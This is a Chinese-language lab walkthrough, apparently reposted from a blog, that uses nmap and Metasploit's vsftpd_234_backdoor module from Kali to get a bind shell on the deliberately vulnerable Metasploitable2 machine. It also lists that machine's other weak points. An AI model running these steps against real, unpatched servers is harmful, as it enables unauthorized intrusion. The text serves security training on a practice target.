攻擊機:kali
靶機:Metasploitable2(一個特制的ubuntu作業系統,設計初衷作為安全工具測驗和演示常見漏洞攻擊的環境,默認開放高危埠如21、22、23、445、6000等等,而且具有很多未打補丁的高危漏洞)
Metasploitable2漏洞:弱口令漏洞(如vnc、mysql、PostgreSQL等)、Samba MS-RPC Shell命令注入漏洞 、Vsftpd漏洞、Linux NFS共享目錄配置漏洞、Tomcat管理臺默認口令漏洞、root用戶弱口令漏洞(SSH爆破) 、Distcc后門漏洞 等等
利用vsftpd攻擊演示及利用
一、使用nmap掃描Metasploitable靶機
命令【nmap -sT -P0 -A IP】
-sT是指隱秘的TCP連接掃描,使用這個引數可以進行可靠的埠列舉;-A是指綜合掃描,用于作業系統彈窗;-P0、-Pn引數將會假設所有的目標 IP 均為存活,并一個一個進行埠掃描,在一零年之后,P0和 PN 選項被一起合并到 Pn 選項之中

通過nmap發現21、22、23、25等等開放埠數十個,這里我們使用msf內的search命令搜索關于vsftpd攻擊模塊
二、使用msf內vsftpd攻擊模塊
想使用metasploit框架,需要啟用metasploit所依賴的postgresql資料庫
在kali Linux上啟動postgresql命令【systemctl start postgresql】

使用【systemctl status postgresql】命令查詢是否啟動,當Active顯示active(exited)時,為啟動狀態

啟動msf
命令【msfconsole】

搜選vsftpd滲透攻擊模塊,并嘗試用它攻擊這臺主機

使用模塊
命令【use exploit/unix/ftp/vsftpd_234_backdoor】

注:出現No payload configured, defaulting to cmd/unix/interact的提示,是默認將攻擊載荷設定為cmd/unix/interact
使用show options顯示運行此模塊需配置的引數

將rhosts設定為Metasploitable靶機IP【在靶機內使用ip a查看當前IP地址】
命令【setg rhosts 192.168.200.134】
set與setg的區別:setg為設定全域引數,方便選擇多模塊時默認配置第一次設定的IP地址,不必每次遇到某個引數時重新設定

exploit


這種型別攻擊為命令執行漏洞攻擊,使用了一個系結的互動shell,在目標主機上開啟一個埠進行監聽,Metasploit創建了一個直接到目標的連接(如果攻擊防火墻或NAT網關后的主機,需使用反彈式連接payload)
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/298299.html
標籤:其他
下一篇:vulnhub sar 靶場練習
